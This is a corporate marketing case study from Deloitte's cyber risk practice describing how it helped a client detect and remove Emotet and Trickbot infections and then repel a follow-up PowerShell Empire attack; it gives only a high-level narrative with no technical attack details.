Case studies

When attackers don’t learn their lesson on the first try, don’t give them a second chance

A cyber incident response case study

Even with advanced warning, it can be nearly impossible to prevent a ransomware attack. With the help of Deloitte’s extensive forensic, remediation, and monitoring capabilities, our client was able to rebound from one attack, quickly respond to a second attack, and work toward preventing future attacks.

The client dilemma

The client was provided with intelligence indicating it was at risk for an imminent ransomware attack. Deloitte was engaged by the client by noon on the same day to discuss the information and triage activities thus far, which included shutting off internet access for all its sites and a rudimentary analysis of the environment using the indicators the client received leading to the discovery of malware on six of the client’s systems. Beyond the client’s initial discovery of compromised systems, Deloitte performed an in-depth response, resulting in discovery of additional compromised systems.


The Deloitte response

After the kick-off call, Deloitte quickly got to work investigating and triaging the damage. Our team of cyber specialists:

Pushed Deloitte’s Endpoint detection and response tool set (which implements years of custom detection rules and content from our past experiences) to the client’s environment of more than 4,500 systems

Identified remote-access Emotet and Trickbot trojans in more than 100 systems

Performed data forensics on the systems and reverse-engineered the malware to focus the scope of the investigation

Isolated numerous machines to prevent further spreading and began the eradication phase

More than results … recovery

After a week, the client was able to turn the internet back on for its sites for business continuity purposes. Deloitte remained cautious, monitoring the environment in case the threat actor returned. A day later, while monitoring the client’s environment, our custom threat intelligence and curated detection methodologies picked up the threat actor executing the advanced tool PowerShell Empire on about 50 systems. The Deloitte team was able to actively fend off the second-stage attack and, through forensic analysis, identify a key system the attack was leveraging, one not recorded by the client as part of its asset management strategy. A complete system remediation and attacker expulsion were conducted to finally secure the environment. To prevent future damaging attacks, the Deloitte team worked with the client to recommend more effective IT security measures to strengthen its overall cybersecurity posture.

Get in touch

Andrew Morrison
Cyber Risk Services
Deloitte & Touche LLP
Isaac Kohn
Cyber Risk Services
Deloitte & Touche LLP
Wayne Johnson
Senior Manager
Cyber Risk Services 
Deloitte & Touche LLP
Mike Wilson
Specialist Leader
Cyber Risk Services 
Deloitte & Touche LLP

Fullwidth SCC. Do not delete! This box/component contains JavaScript that is needed on this page. This message will not be visible when page is activated.

Did you find this useful?